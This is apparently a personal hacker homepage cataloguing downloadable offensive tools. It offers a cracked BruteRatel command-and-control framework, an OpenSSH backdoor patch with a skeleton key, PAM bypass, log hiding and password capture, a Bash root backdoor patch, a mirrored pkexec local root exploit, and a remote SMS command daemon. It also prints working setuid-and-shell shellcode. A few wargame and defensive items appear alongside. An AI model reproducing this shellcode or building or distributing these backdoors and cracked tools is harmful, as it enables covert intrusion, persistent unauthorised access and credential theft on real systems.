.dtors [at] bob [dot] net .___ __ __| _// |_ ___________ ______ / __ |\ __\/ _ \_ __ \/ ___/ / /_/ | | | ( <_> ) | \/\___ \ /\____ | |__| \____/|__| /____ > \/ \/ \/ "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x20\x44\x53\x52" "\x68\x66\x72\x6f\x6d\x68\x62\x6f\x62\x20\x89\xe1" "\xb2\x0f\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
Recent Misc
Remember Wargames of the 2000 era? Play here. There are a series of levels (4 as of writing) that will lead you to being able to get root on a server. Every level will have clues to help you with the next. Have fun!

Post Exploitation Framework BruteRatel-1.2.2-Cracked.zip is a customised command and control center for Red Team and Adversary Simulation. Documentation is here.

IPS Grepinator is a firewall wrapper for ipset and iptables that uses pre-defined filters to comb through log files and match on patterns that may indicate an attempt at hacking, bruteforcing or enumeration of a server.

Backdoor OpenSSH-8.4-backdoor.patch is a patch I wrote for the most recent version of OpenSSH (8.4 Portable as of writing). This patch adds a hardcoded skeleton key to the ssh daemon. A few bonuses include:
  • No connection traces in the log files
  • Usernames and passwords both in and out are logged - currently not enabled
  • PAM bypass
  • Security through obscurity? Logging of usernames and passwords can be routed to /dev/null when deemed an invasion of privacy. Alternativley use it to recover passwords of a compromised system.

    Shellcode set-loop.c - will find the highest UID to setuid(). Most services will run as non-root, so something generic was called for.
    char shellcode[] =
            "\x31\xdb\x31\xc9\x31\xc0\xb0\x17\xcd\x80\x3d\xff\xff\xff\xff"
            "\x72\x04\x43\x41\xeb\xef\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68"
            "\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24"
            "\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80";
    
    Script Obfuscator -is a bash script- is a bash script obfuscator. Obfuscation (or beclouding) is the hiding of intended meaning in communication, making communication confusing, wilfully ambiguous, and harder to interpret. Anyone with half a brain cell can reverse this obfuscation, but it was better than plaintext for its intended purpose.

    OLD Wargames BishII was one of the first multi-shellcode & multi-platform eggshell loaders back in mid 2000's.

    Exploit (golden oldie) YahPoo.c was an exploit I wrote for a vulnerbility I found in the Yahoo Messenger Windows application over a decade ago. This was the first exploit I sold to Verisign (formerly IDefence). This vulnerbility affected MILLIONS of Yahoo Messenger clients worldwide and with the right shellcode allowed an attacker to install a backdoor on any Windows machine of that era (XP/2k).

    Backdoor Bash-4.2.patch is a patch to chmod a 'file' 4775 should a certain 'condition' exist. This tool/backdoor was used to regain root access in a King of the hill style wargame. See patch for more info.

    Documents A bit of light reading...

    Mirror blasty-vs-pkexec.c Download the Local root exploit - mirrored - Original can be found at https://haxx.in

    Museum Section (+8 years old)
    sunny-day.c - A purpose built bug for frame pointer vulnerbility exploration.

    What happens when you overwrite the least siginificant byte from a saved frame pointer?

    Tips:
  • mains() stack frame will be shifted. (if X > Y ).
  • X is the original least significant byte.
  • Y is the overflow byte.
  • /exploits - Archive of my old exploits from 2000-2010
    /shellcode - Archive of my shellcode from 2000-2010
    /papers - Archive of my tutorials written on shellcoding, exploiting buffer overflows, bit manipulation etc.. from 2000-2010
    SmS.c - Remotely execute commands on any server using SMS or email. This is a small daemon that monitors the mail queue for specific strings. If identified correctly, commands will be executed. This tool was once a very useful part of my toolkit, that is, before smart phones were invented. Old hat now :(
    Ancient TrojanSpy:Linux/LSD.A - What began as a honeypot project, ended up leaking onto the popular PacketStormSecurity website. Somehow this very basic trojan was used in educational studies reverse engineering viruses and trojans. See PDF: from https://www.wcsit.org Packetstormsecurity later changed the description of the trojan to reflect that instead of it being an exploit released by "The Last Stage of Delerium" that it is a trojan; The hp-ftp trojan pretends to be an exploit created by the Last Stage of Delirium that targets HP-UX FTP servers. Upon executions this file will try to add two new accounts to the password file and will send an email with netstat information to aborted@yahoo.com and LinuxPir8@yahoo.com. - No one said it was pretty!
    Live Cyber Attacks